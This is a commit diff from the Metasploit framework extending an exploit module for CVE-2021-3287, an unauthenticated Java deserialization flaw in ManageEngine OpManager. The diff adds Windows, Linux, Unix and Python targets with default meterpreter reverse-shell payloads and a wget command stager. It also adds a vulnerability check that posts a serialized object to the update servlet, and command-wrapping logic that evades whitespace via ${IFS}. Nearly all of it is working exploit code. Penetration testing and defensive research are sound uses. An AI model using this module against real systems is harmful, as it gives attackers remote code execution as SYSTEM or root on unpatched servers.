Add and test the remaining targets

rapid7 · Sep 14, 2021 · 3986707 · 3986707
1 parent d640866
commit 3986707
Showing 1 changed file with 73 additions and 14 deletions.
diff --git a/modules/exploits/multi/http/opmanager_sumpdu_deserialization.rb b/modules/exploits/multi/http/opmanager_sumpdu_deserialization.rb
@@ -17,13 +17,19 @@ def initialize(info = {})
         info,
         'Name' => 'ManageEngine OpManager SumPDU Java Deserialization',
         'Description' => %q{
+          An HTTP endpoint used by the Manage Engine OpManager Smart Update Manager component can be leveraged to
+          deserialize an arbitrary Java object. This can be abused by an unauthenticated remote attacker to execute OS
+          commands in the context of the OpManager application (NT AUTHORITY\SYSTEM on Windows or root on Linux). This
+          vulnerability is also present in other products that are built on top of the OpManager application.
         },
         'Author' => [
-          'Spencer McIntyre', # Metasploit module
+          'Johannes Moritz', # Original Vulnerability Research
+          'Robin Peraglie', # Original Vulnerability Research
+          'Spencer McIntyre' # Metasploit module
         ],
         'License' => MSF_LICENSE,
-        'Platform' => 'win',
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64],
+        'Platform' => [ 'win', 'linux', 'python', 'unix' ],
         'References' => [
           [ 'CVE', '2021-3287' ],
           [ 'URL', 'https://haxolot.com/posts/2021/manageengine_opmanager_pre_auth_rce/' ]
@@ -34,6 +40,7 @@ def initialize(info = {})
             'Windows Command',
             {
               'Arch' => ARCH_CMD,
+              'Platform' => 'win',
               'Type' => :win_cmd,
               'DefaultOptions' => {
                 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
@@ -44,22 +51,54 @@ def initialize(info = {})
             'Windows Dropper',
             {
               'Arch' => [ARCH_X86, ARCH_X64],
+              'Platform' => 'win',
               'Type' => :win_dropper,
-              # 'CmdStagerFlavor' => :certutil, # This works without issue
               'DefaultOptions' => {
                 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
               }
             }
           ],
           [
-            'PowerShell Stager',
+            'Windows PowerShell',
             {
               'Arch' => [ARCH_X86, ARCH_X64],
-              'Type' => :psh_stager,
+              'Platform' => 'win',
+              'Type' => :win_psh,
               'DefaultOptions' => {
                 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
               }
             }
+          ],
+          [
+            'Unix Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix',
+              'Type' => :nix_cmd
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Platform' => 'linux',
+              'Type' => :nix_dropper,
+              'DefaultOptions' => {
+                'CMDSTAGER::FLAVOR' => 'wget',
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Python',
+            {
+              'Arch' => ARCH_PYTHON,
+              'Platform' => 'python',
+              'Type' => :python,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'python/meterpreter/reverse_tcp'
+              }
+            }
           ]
         ],
         'DefaultOptions' => {
@@ -81,8 +120,17 @@ def initialize(info = {})
   end
 
   def check
-    # TODO: write this
-    return Exploit::CheckCode::Unknown
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet'),
+      # Serialized int 1002
+      'data' => "\xac\xed\x00\x05\x77\x04\x00\x00\x03\xea".b
+    })
+    return Exploit::CheckCode::Unknown unless res
+    # the patched version will respond back with 200 OK and no data in the response body
+    return Exploit::CheckCode::Safe unless res.code == 200 && res.body.start_with?("\xac\xed\x00\x05".b)
+
+    Exploit::CheckCode::Appears
   end
 
   def exploit
@@ -111,25 +159,36 @@ def exploit
 
     # Step 3: Exploit the deserialization vulnerability to run commands
     case target['Type']
-    when :win_cmd
-      execute_command(payload.encoded)
+    when :nix_dropper
+      execute_cmdstager
     when :win_dropper
       execute_cmdstager
-    when :psh_stager
+    when :win_psh
       execute_command(cmd_psh_payload(
         payload.encoded,
         payload.arch.first,
         remove_comspec: true
       ))
+    else
+      execute_command(payload.encoded)
     end
   end
 
   def execute_command(cmd, _opts = {})
-    vprint_status("Executing command: #{cmd}")
-
     # the frohoff/ysoserial#168 gadget chain is a derivative of CommonsBeanutils1 that has been updated to remove the
     # dependency on the commons-collections library making it usable in this context
-    java_payload = Msf::Util::JavaDeserialization.ysoserial_payload('frohoff/ysoserial#168', "cmd.exe /c #{cmd}")
+    case target['Platform']
+    when 'python'
+      cmd.prepend('python -c ')
+    when 'win'
+      cmd.prepend('cmd.exe /c ')
+    else
+      cmd.gsub!(/\s+/, '${IFS}')
+      cmd.prepend('sh -c ')
+    end
+
+    vprint_status("Executing command: #{cmd}")
+    java_payload = Msf::Util::JavaDeserialization.ysoserial_payload('frohoff/ysoserial#168', cmd)
 
     res = send_request_cgi({
       'method' => 'POST',